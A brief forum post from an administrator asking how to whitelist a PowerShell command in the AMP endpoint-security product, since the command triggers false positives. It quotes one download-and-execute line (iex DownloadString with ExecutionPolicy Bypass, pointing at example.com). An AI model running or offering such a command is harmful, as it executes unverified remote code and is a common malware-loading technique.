Admins being admins like to use powershell to solve certain task. To do this they will often run a powershell file downloaded from a server, i.e:
C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -ExecutionPolicy Bypass -Command iex ((New-Object System.Net.WebClient).DownloadString('https://example.com/script.ps1'))
This being an obvious red flag triggers AMP, but gives a lot of false positives in this case.
Is there any way to exclude/whitelist something like this? Like the full command with arguments, the server from which it downloads??
Regards,
Thomas
